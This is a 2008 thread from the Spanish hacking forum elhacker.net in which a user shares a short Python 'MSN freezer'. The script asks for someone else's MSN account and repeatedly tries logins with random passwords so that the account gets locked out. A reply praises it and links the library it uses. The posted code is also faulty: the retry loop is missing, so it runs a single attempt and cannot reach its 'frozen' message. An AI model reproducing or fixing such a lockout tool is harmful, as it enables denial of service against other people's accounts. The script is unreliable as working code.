elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  MSN Freezer [Usando MSNP]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MSN Freezer [Usando MSNP]  (Leído 2,577 veces)
Erik#


Desconectado Desconectado

Mensajes: 1.138


Gundam


Ver Perfil
MSN Freezer [Usando MSNP]
« en: 21 Octubre 2008, 21:19 pm »

Bueno, aqui os dejo este msn freezer que hice con la libreria msnp, solo buscais por google y la encontrareis:

Código
  1. #!/usr/bin/python
  2. import msnp
  3. import random
  4. cuenta = raw_input ("Introduce el msn que deseas congelar: ")
  5. esperas = 0
  6. print "ESTADO: Congelando la cuenta", str(cuenta)
  7.    msn = msnp.Session()
  8.    try:
  9.        msn.login (cuenta, random.randrange(10))
  10.    except:
  11.        esperas = esperas + 1
  12.        if esperas == 10:
  13.            print "ESTADO: El msn", cuenta ,"esta congelado"


« Última modificación: 24 Octubre 2008, 17:32 pm por Erik# » En línea

NetJoe

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: MSN Freezer [Usando MSNP]
« Respuesta #1 en: 24 Octubre 2008, 16:37 pm »

 Me parece excelente y ademas es sencillo.

  La libreria Msnp la pueden descargar desde la web oficial http://msnp.sourceforge.net/

  Vale decir para los que no estan muy familiarizados con el mundo script que el lenguaje utilizado es Python.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines